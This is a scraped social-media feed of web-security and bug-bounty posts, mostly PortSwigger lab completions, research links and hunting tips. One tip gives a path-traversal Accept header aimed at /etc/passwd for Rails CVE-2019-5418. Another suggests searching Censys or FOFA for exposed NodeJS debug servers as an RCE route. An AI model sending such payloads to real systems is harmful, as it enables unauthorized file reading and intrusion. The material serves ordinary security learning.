You might like
I completed the Web Security Academy lab: Exploiting server-side parameter pollution in a REST URL @WebSecAcademy portswigger.net/web-security/a…
Interesting technique by @j_zere: When a cache deception requires a specific header/token that you can't directly provide, try chaining it with CSPT to make it exploitable.
A Novel Technique for SQL Injection in PDO’s Prepared Statements - @assetnote slcyber.io/assetnote-secu…
slcyber.io
Novel SQL Injection Technique in PDO Prepared Statements
Searchlight Cyber's Security Research team details a Novel Technique for SQL Injection in PDO's Prepared Statements.
I completed the Web Security Academy lab: Exploiting a mass assignment vulnerability @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Finding and exploiting an unused API endpoint @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Exploiting an API endpoint using documentation @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Exploiting server-side parameter pollution in a query string @WebSecAcademy portswigger.net/web-security/a…
I Researched Ruby class pollutions and discovered a new exploitation method, Rotate Chains, achieving 100% exploit success rate; also created a bi0s CTF 2025 challenge based on the technique which had 0 solves. Read the research/writeup: winters0x64.xyz/posts/post-2
I don’t get why bug hunters tweet stuff like ‘Had a great month’ and post a screenshot with everything censored… and the reports aren’t even triaged yet. Thanks to HackerOne for that trailing dot showing the status of every report. What exactly are you trying to show?
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
I completed the Web Security Academy lab: JWT authentication bypass via algorithm confusion with no exposed key @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via algorithm confusion @WebSecAcademy portswigger.net/web-security/j…
Bug Hunters 🔥 Ever stumbled upon this weird message? "WebSockets request was expected" If you did, congratz! You just found a NodeJS server in debug mode, ready to quickly move on to RCE via simple DevTools 💥💥💥 Search for this message in Censys/FOFA and your automation 🤑
Just dropped a new video on Web Cache Deception to Account Takeover packed with powerful bypass techniques. Don’t miss it! youtu.be/Epzi1fWwdKk?si…
youtube.com
YouTube
Mastering Web Cache Deception: From Exploit to Account Takeover, a...
I completed the Web Security Academy lab: JWT authentication bypass via kid header path traversal @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via jku header injection @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via jwk header injection @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via weak signing key @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via flawed signature verification @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via unverified signature @WebSecAcademy portswigger.net/web-security/j…
United States Trends
- 1. phil 39.2K posts
- 2. phan 58.9K posts
- 3. Columbus 198K posts
- 4. President Trump 1.21M posts
- 5. Middle East 299K posts
- 6. Cam Talbot N/A
- 7. Thanksgiving 58.2K posts
- 8. #LGRW 1,853 posts
- 9. #IndigenousPeoplesDay 16.1K posts
- 10. Brian Callahan 12.3K posts
- 11. Titans 36.4K posts
- 12. Macron 233K posts
- 13. Azzi 10.5K posts
- 14. #UFC323 4,970 posts
- 15. Cejudo 1,401 posts
- 16. Cape Verde 25.1K posts
- 17. Vrabel 6,788 posts
- 18. HAZBINTOOZ 7,521 posts
- 19. #DonnaAdelson N/A
- 20. Native Americans 17K posts
Something went wrong.
Something went wrong.